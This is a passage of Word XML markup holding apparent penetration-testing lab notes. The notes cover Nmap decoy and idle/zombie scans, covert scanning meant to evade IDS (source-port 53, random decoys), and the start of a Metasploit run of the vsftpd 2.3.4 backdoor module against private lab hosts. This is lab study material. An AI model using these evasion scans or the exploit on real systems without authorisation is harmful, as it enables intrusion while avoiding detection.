      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DFBEA" w14:textId="56B7FC13" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>Perform a scan using the Zombie and FTP server as decoys. The ME keyword tells Nmap where to place your real IP. RND:10 adds 10 random IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710617F9" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAB60F" w14:textId="56CEA5A9"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192.168.56.30,192.168.56.40,x.x.x.x 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E71987" w14:textId="50B62D98" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5D1D2" w14:textId="77FFFAF4"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ME,RND:10 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096FBD50" w14:textId="324B6192" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24F7A2" w14:textId="0F04544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RND:10 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CE3A2" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="1EF59944" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idle/Zombie Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>): PASSIVE SCAN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C038D" w14:textId="7726729E" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````````````````````````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF07F4" w14:textId="6B4E3CA5" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>Use a "zombie" host to scan indirectly, making it appear as if the zombie is scanning the target (your IP is hidden).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD0DCE7" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B76BC7" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"># Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>zombie_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9D28F" w14:textId="106DFBF1"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sI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.30 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFBE98" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FB6CB" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overt vs. Covert Methodologies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4354610A" w14:textId="5CBE3E19" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````````````````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B8790" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[+] Overt Scanning: Prioritizes speed and information gathering. This approach is loud, easily detected by Intrusion Detection Systems (IDS), and is typically used when you have explicit permission and want to map a network quickly (e.g., during an authorized internal penetration test).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C6B5E" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="411FB6A3" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>1) Enable service/version detection (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>), OS detection (-O), and default script scanning (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>) to get a complete picture in one go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE5B9C" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>2) Coverage: Scan all 65,535 TCP ports (-p 0-65535) to ensure nothing is missed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD6C0D" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="3C271CA5" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F370A3" w14:textId="28572E52" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p0-65535 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --reason 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4434DCC1" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">-p0-65535 </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Scan all TCP ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05B327" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: A fast SYN scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6AD3E" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Probe open ports to determine service/version info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2107B4" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>-O</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Enable OS detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA22F9" w14:textId="77777777" w:rsidR="0044208E" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Run default safe scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D1267" w14:textId="05CE561C" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t>--reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Shows why Nmap concluded a port is open/closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507AB8C" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="0FC7E06D" w14:textId="013E78E5" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[+] Covert Scanning: Prioritizes stealth and evasion. This approach is slow, methodical, and designed to bypass or confuse security controls. It is used in red team exercises or when you need to remain undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F97404" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>a) Ultimate Stealth: Use the Idle Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>sI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>) to ensure zero packets are sent from your IP to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E47CB1" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>b) Obfuscation: Use decoys (-D) and source port manipulation (-g) to confuse any logs that are generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55470861" w14:textId="763C5F31" w:rsidR="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>c) Verification: Use different scan types (NULL, XMAS) to cross-validate findings from different angles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBAC84" w14:textId="77777777" w:rsidR="0044208E" w:rsidRPr="00360BE5" w:rsidRDefault="0044208E" w:rsidP="00360BE5"/>
    <w:p w14:paraId="51258E05" w14:textId="39ACBF1F"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sSVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --source-port 53 --min-parallelism 10 --min-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 --max-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 20 --max-retries 2 --max-scan-delay 5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target_range</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28C62C23" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">--min-parallelism 10  </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: 10 Parallel tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597F7C8" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>--max-retries 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Number of Retry Probing Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42098EEB" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>--max-scan-delay 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Delay between each scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCB05B" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>--min-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>hostgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> 10 --max-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>hostgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:tab/>
        <w:t>: Scan min 10 and max 20 hosts at one time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053743A1" w14:textId="0F5E9A2F" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>_______________________________</w:t>
      </w:r>
      <w:r>
        <w:t>________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A3C59" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>All:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781C1F8" w14:textId="7AE71D5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-g 53 -D RND:5 -p 21,22,80,111 --reason 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB0E34" w14:textId="3437EE2C" w:rsidR="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>___________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59635BB0" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="3DDF72DC" w14:textId="6944A285" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit+Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD71078" w14:textId="091BC633" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````````````````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E80891" w14:textId="45EB20F0" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">- Port 21 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02C8FA" w14:textId="3B010303" w:rsidR="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36F682A7" w14:textId="77777777" w:rsidR="0044208E" w:rsidRDefault="0044208E" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F686EB" w14:textId="77777777" w:rsidR="0044208E" w:rsidRPr="00360BE5" w:rsidRDefault="0044208E" w:rsidP="00360BE5"/>
    <w:p w14:paraId="4D1508D7" w14:textId="77777777" w:rsidR="0044208E" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20259926" w14:textId="591671B5" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D710C69" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="54F60E88" w14:textId="720DED55" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Name                                  Disclosure Date  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>Rank       Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9850F1" w14:textId="12CAE975" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   ----</w:t>
      </w:r>
      <w:r>
        <w:t>-----------</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:r>
        <w:t>------</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>---------------</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--             </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">  ----</w:t>
      </w:r>
      <w:r>
        <w:t>----</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>-----------</w:t>
      </w:r>
      <w:r>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34663014" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F32ED" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="2C6188C3" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C87270"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options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DB051D" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="555FD584"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588F1AB1" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="04FFEE2B" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
